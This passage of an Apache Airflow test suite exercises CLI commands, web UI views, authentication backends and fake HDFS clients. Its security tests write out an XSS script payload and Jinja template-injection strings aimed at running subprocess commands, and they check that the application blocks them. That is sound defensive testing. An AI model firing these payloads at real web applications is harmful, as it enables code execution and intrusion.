cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_pool_import_export(self):
# Create two pools first
pool_config_input = {
"foo": {
"description": "foo_test",
"slots": 1
},
"baz": {
"description": "baz_test",
"slots": 2
}
}
with open('pools_import.json', mode='w') as f:
json.dump(pool_config_input, f)
# Import json
try:
cli.pool(self.parser.parse_args(['pool', '-i', 'pools_import.json']))
except Exception as e:
self.fail("The 'pool -i pools_import.json' failed: %s" % e)
# Export json
try:
cli.pool(self.parser.parse_args(['pool', '-e', 'pools_export.json']))
except Exception as e:
self.fail("The 'pool -e pools_export.json' failed: %s" % e)
with open('pools_export.json', mode='r') as f:
pool_config_output = json.load(f)
self.assertEqual(
pool_config_input,
pool_config_output,
"Input and output pool files are not same")
os.remove('pools_import.json')
os.remove('pools_export.json')
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as f:
return int(f.read())
except Exception:
sleep(1)
def test_cli_webserver_foreground(self):
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
        # Shorten the timeout so that this test doesn't take too long
configuration.conf.set("webserver", "web_server_master_timeout", "10")
args = self.parser.parse_args(['webserver'])
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
except Exception:
            # an exception is expected here since the dag doesn't exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_python = self.dagbag.dags['example_python_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_python = self.dag_python.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
# The HTML should contain data for the last-run. A link to the specific run,
# and the text of the date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_python.dag_id,
"execution_date": self.dagrun_python.execution_date,
}).replace("&", "&")
self.assertIn(url, resp_html)
self.assertIn(
self.dagrun_python.execution_date.strftime("%Y-%m-%d %H:%M"),
resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
# confirm that the graph page loads when execution_date is blank
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator&execution_date=')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=missing_dag',
follow_redirects=True)
self.assertIn("seems to be missing", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_python_operator')
self.assertIn("example_python_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(EXAMPLE_DAG_DEFAULT_DATE))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=print_the_context&"
"dag_id=example_python_operator&upstream=false&downstream=false&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/clear?task_id=print_the_context&'
'dag_id=example_python_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(EXAMPLE_DAG_DEFAULT_DATE))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=print_the_context&"
"dag_id=example_python_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=section-1-task-1&"
"dag_id=example_subdag_operator.section-1&future=false&past=false&"
"upstream=false&downstream=true&recursive=true&"
"execution_date={}&"
"origin=/admin".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.end",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-1.section-1-task-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-2",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-3",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-4",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-5",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.some-other-task",
response.data.decode('utf-8'))
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=example_python_operator&"
"execution_date={}".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
self.assertIn("print_the_context", response.data.decode('utf-8'))
def test_dag_view_task_with_python_operator_using_partial(self):
response = self.app.get(
'/admin/airflow/task?'
'task_id=test_dagrun_functool_partial&dag_id=test_task_view_type_check&'
'execution_date={}'.format(EXAMPLE_DAG_DEFAULT_DATE))
self.assertIn("A function with two args", response.data.decode('utf-8'))
def test_dag_view_task_with_python_operator_using_instance(self):
response = self.app.get(
'/admin/airflow/task?'
'task_id=test_dagrun_instance&dag_id=test_task_view_type_check&'
'execution_date={}'.format(EXAMPLE_DAG_DEFAULT_DATE))
self.assertIn("A __call__ method", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=EXAMPLE_DAG_DEFAULT_DATE,
end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("core", "secure_mode", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
def tearDown(self):
configuration.conf.remove_option("core", "SECURE_MODE")
class PasswordUserTest(unittest.TestCase):
def setUp(self):
user = models.User()
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user = PasswordUser(user)
self.password_user.username = "password_test"
@mock.patch('airflow.contrib.auth.backends.password_auth.generate_password_hash')
def test_password_setter(self, mock_gen_pass_hash):
mock_gen_pass_hash.return_value = b"hashed_pass" if six.PY3 else "hashed_pass"
self.password_user.password = "secure_password"
mock_gen_pass_hash.assert_called_with("secure_password", 12)
def test_password_unicode(self):
# In python2.7 no conversion is required back to str
# In python >= 3 the method must convert from bytes to str
self.password_user.password = "secure_password"
self.assertIsInstance(self.password_user.password, str)
def test_password_user_authenticate(self):
self.password_user.password = "secure_password"
self.assertTrue(self.password_user.authenticate("secure_password"))
def test_password_unicode_user_authenticate(self):
self.password_user.username = u"🐼" # This is a panda
self.password_user.password = "secure_password"
self.assertTrue(self.password_user.authenticate("secure_password"))
def test_password_authenticate_session(self):
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user.password = 'test_password'
session = Session()
session.add(self.password_user)
session.commit()
query_user = session.query(PasswordUser).filter_by(
username=self.password_user.username).first()
self.assertTrue(query_user.authenticate('test_password'))
session.query(models.User).delete()
session.commit()
session.close()
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except Exception:
pass
configuration.conf.set("ldap", "uri", "ldap://openldap:389")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except Exception:
pass
configuration.conf.set("ldap", "uri", "ldap://openldap:389")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862, 'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
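# Illustrative sketch (added; not used by the test suite): FakeHDFSHook hands back a
# FakeSnakeBiteClient, so HDFS-sensor-style code paths can be exercised without a real
# cluster. The conn_id below is arbitrary.
def example_fake_hdfs_listing():
    client = FakeHDFSHook(conn_id='fake_hdfs').get_conn()
    # a single known file yields exactly one entry
    assert len(client.ls(['/datadirectory/datafile'])) == 1
    # an empty directory (without include_toplevel) yields no entries
    assert client.ls(['/datadirectory/empty_directory']) == []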
class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:[email protected]:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
